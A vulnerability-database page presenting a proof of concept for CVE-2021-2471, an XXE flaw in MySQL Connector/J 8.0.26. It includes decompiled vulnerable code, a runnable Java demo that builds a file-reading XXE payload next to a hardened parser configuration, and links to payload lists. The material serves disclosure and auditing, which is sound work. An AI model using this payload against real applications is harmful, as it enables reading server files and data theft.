Related vulnerability
Title:
Oracle MySQL input validation error vulnerability
(CVE-2021-2471)
Description: Oracle MySQL is an open-source relational database management system from Oracle Corporation (USA). MySQL Connectors are the drivers that applications use to connect to MySQL. An input validation error vulnerability exists in the MySQL Connectors product of Oracle MySQL; it allows a high-privileged attacker with network access via multiple protocols to compromise MySQL Connectors. Successful exploitation results in unauthorized access to critical data or complete access to all data accessible to MySQL Connectors, and can cause MySQL Connectors to hang or crash repeatedly.
Description
PoC for CVE-2021-2471 - XXE in MySQL Connector/J
Introduction
# CVE-2021-2471 - XXE in MySQL Connector/J
Vulnerability in the MySQL Connectors product of Oracle MySQL (component: Connector/J). Supported versions that are affected are 8.0.26 and prior.
Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all MySQL Connectors accessible data and unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Connectors.
### Disclaimer:
This vulnerability was found by Xu Yuanzhen of Alibaba Cloud Security Team and Hongkun Chen of Alibaba.
This PoC is provided for research purposes. Do not use it to attack targets that you do not have explicit permission to exploit.
### Vendor Disclosure:
The vendor's disclosure and fix for this vulnerability can be found [here](https://www.oracle.com/security-alerts/cpuoct2021.html).
### Proof Of Concept:
The XXE vulnerability arises when XML containing a malicious DTD (an external entity declaration) reaches a `MysqlSQLXML` object; it is triggered when that object's `getSource()` method is called with `DOMSource.class`.

As seen in the code below, decompiled from mysql-connector-java-8.0.26.jar, when `DOMSource.class` is passed to `getSource()` the method builds a `DocumentBuilder` from a default `DocumentBuilderFactory` without disabling DOCTYPE declarations or external entity resolution. If an attacker controls the content of the `InputSource` handed to that builder, the parser resolves the attacker's external entities (for example a `SYSTEM` entity pointing at a local file or a remote URL) while building the DOM, which is the XXE:
```java
public <T extends Source> T getSource(Class<T> clazz) throws SQLException {
    try {
        this.checkClosed();
        this.checkWorkingWithResult();
        InputSource inputSource;
        if (clazz != null && !clazz.equals(SAXSource.class)) {
            SQLException sqlEx;
            if (clazz.equals(DOMSource.class)) {
                try {
                    // Default factory: DOCTYPE is allowed and external entities are
                    // resolved. No FEATURE_SECURE_PROCESSING, no disallow-doctype-decl.
                    DocumentBuilderFactory builderFactory = DocumentBuilderFactory.newInstance();
                    builderFactory.setNamespaceAware(true);
                    DocumentBuilder builder = builderFactory.newDocumentBuilder();
                    if (this.fromResultSet) {
                        // Vector 2: XML read from a result-set column (database contents)
                        inputSource = new InputSource(this.owningResultSet.getCharacterStream(this.columnIndexOfXml));
                    } else {
                        // Vector 1: XML previously supplied through setString()
                        inputSource = new InputSource(new StringReader(this.stringRep));
                    }
                    // parse() expands the external entities here: this is the XXE trigger
                    return new DOMSource(builder.parse(inputSource));
                    // ... remainder of the method omitted in this excerpt
```
There are two ways to deliver the malicious XML to the `MysqlSQLXML` object; in both cases the entities are only expanded once `getSource(DOMSource.class)` is called on it:
- Through the `sqlxml.setString()` method, if the attacker can call it directly or propagate arbitrary input into it.
- By placing the XML in the database and having the victim retrieve it via a result set with `resultSet.getSQLXML()`, which requires write access to the database or the ability to point the victim's connection at an attacker-controlled MySQL server.
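The following is an added example, not code from this repository or from Oracle. It reproduces the parse pattern of the decompiled `getSource()` excerpt with plain JDK classes, so it runs without mysql-connector-java on the classpath, and places next to it the hardened `DocumentBuilderFactory` configuration that prevents the entity expansion. The class name `SqlxmlXxeDemo`, the method names and the temporary "secret" file are all constructed for the demonstration; against the vulnerable JAR the same payload reaches the same kind of builder through `MysqlSQLXML.setString()` (vector 1) or a result-set column (vector 2), followed by `getSource(DOMSource.class)`.

```java
import java.io.StringReader;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Path;

import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.transform.dom.DOMSource;

import org.w3c.dom.Document;
import org.xml.sax.InputSource;
import org.xml.sax.SAXParseException;

// Added example (not the connector's own code): same DOM parse pattern as the
// decompiled MysqlSQLXML.getSource(DOMSource.class), beside a hardened variant.
public class SqlxmlXxeDemo {

    // Mirrors the 8.0.26 excerpt: default factory, namespace-aware, no
    // restriction on DOCTYPE declarations or external entity resolution.
    static DOMSource vulnerableGetSource(String xml) throws Exception {
        DocumentBuilderFactory builderFactory = DocumentBuilderFactory.newInstance();
        builderFactory.setNamespaceAware(true);
        DocumentBuilder builder = builderFactory.newDocumentBuilder();
        InputSource inputSource = new InputSource(new StringReader(xml));
        return new DOMSource(builder.parse(inputSource));
    }

    // Hardened variant: refuse DOCTYPE outright, and as defence in depth also
    // turn off external entities, XInclude and entity expansion. The feature
    // URIs are the standard Xerces ones honoured by the JDK's built-in parser.
    static DOMSource hardenedGetSource(String xml) throws Exception {
        DocumentBuilderFactory builderFactory = DocumentBuilderFactory.newInstance();
        builderFactory.setNamespaceAware(true);
        builderFactory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        builderFactory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        builderFactory.setFeature("http://xml.org/sax/features/external-general-entities", false);
        builderFactory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        builderFactory.setXIncludeAware(false);
        builderFactory.setExpandEntityReferences(false);
        DocumentBuilder builder = builderFactory.newDocumentBuilder();
        return new DOMSource(builder.parse(new InputSource(new StringReader(xml))));
    }

    // Classic file-read XXE payload: the SYSTEM entity is resolved while the
    // DOM is built, so its contents end up as the text of <data>.
    static String xxePayload(Path target) {
        return "<?xml version=\"1.0\"?>\n"
             + "<!DOCTYPE data [<!ENTITY xxe SYSTEM \"" + target.toUri() + "\">]>\n"
             + "<data>&xxe;</data>";
    }

    public static void main(String[] args) throws Exception {
        // Constructed target file; nothing real is read.
        Path secret = Files.createTempFile("cve-2021-2471-", ".txt");
        Files.write(secret, "constructed-secret-value".getBytes(StandardCharsets.UTF_8));
        String payload = xxePayload(secret);

        Document vulnerable = (Document) vulnerableGetSource(payload).getNode();
        System.out.println("vulnerable parser returned: "
                + vulnerable.getDocumentElement().getTextContent());

        try {
            hardenedGetSource(payload);
            System.out.println("hardened parser accepted DOCTYPE (unexpected)");
        } catch (SAXParseException e) {
            System.out.println("hardened parser rejected payload: " + e.getMessage());
        } finally {
            Files.deleteIfExists(secret);
        }
    }
}
```

Run it with `javac SqlxmlXxeDemo.java && java SqlxmlXxeDemo`: the first parser prints the file contents as the element text, the second throws a `SAXParseException` on the DOCTYPE before any entity is touched. When auditing an application for this bug, the check is simply whether attacker-influenced XML can reach a `java.sql.SQLXML` whose `getSource(DOMSource.class)` is later called with a Connector/J version of 8.0.26 or earlier; the out-of-band variant (a `SYSTEM` entity pointing at an attacker's HTTP server) works the same way through the unpatched builder.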
### Additional Resources:
- [PoC XXE using sqlxml.setString()](Test.java)
- [PoC XXE using resultSet.getSQLXML()](https://github.com/SecCoder-Security-Lab/jdbc-sqlxml-xxe/blob/main/src/main/java/me/threedr3am/bug/jdbc/sqlxml/xxe/oracle/OracleJDBC.java)
- [Download vulnerable JAR](https://downloads.mysql.com/archives/get/p/3/file/mysql-connector-java-8.0.26.zip)
- [Other XXE Payloads](https://github.com/payloadbox/xxe-injection-payload-list)
File snapshot
[4.0K] /data/pocs/588ddb32a5213baa7141cb7641b585c8f3ba61e5
├── [3.2K] README.md
└── [ 993] Test.java
0 directories, 2 files
Notes
1. Accessing the PoC through the original source is recommended.
2. If the source is unavailable or cannot be accessed, email f.jinxu#gmail.com (replace # with @) to request a local snapshot.
3. 神龙 has taken a snapshot of the PoC code for you; to support long-term maintenance, please consider paying for the local PoC. Thank you for your support.